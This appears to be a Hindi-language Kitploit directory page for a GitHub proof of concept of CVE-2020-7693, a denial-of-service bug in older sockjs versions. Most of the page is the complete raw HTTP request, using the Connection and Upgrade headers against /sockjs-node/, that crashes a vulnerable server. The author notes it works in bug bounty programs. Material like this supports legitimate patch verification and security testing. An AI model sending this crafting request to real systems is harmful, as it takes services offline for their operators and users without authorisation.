Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-7693 — CVE-2020-7693 के लिए POC (sockjs@0.3.18 संस्करण पर परीक्षण) | Kitploit
उपकरण/GitHubGitHub/thewindghost/cve-2020-7693
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubthewindghost/cve-2020-7693

CVE-2020-7693

CVE-2020-7693 के लिए POC ([email protected] संस्करण पर परीक्षण)

रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-7693 Poc

नोट: मैं पुष्टि करता हूँ कि CVE-2020-7693 के लिए पेलोड बग बाउंटी प्रोग्राम में चल सकता है

विवरण:

  • Upgrade हेडर के websocket मान की गलत हैंडलिंग से sockjs ऐप्स होस्ट करने वाले कंटेनर क्रैश हो जाते हैं। यह sockjs पैकेज के 0.3.20 से पहले के संस्करणों को प्रभावित करता है।

एकल अनुरोध पुराने sockjs-node के माध्यम से सर्वर को क्रैश कर देता है:

  • अनुरोध
root@kitploit:~
GET /sockjs-node/000/ HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: Upgrade
Upgrade: websocket
Cache-Control: no-cache
Connection: close
\r\n (delete-this)
\r\n (delete-this)

  • प्रतिक्रिया
छवि

सर्वर में:

छवि छवि
टूल डाउनलोड करें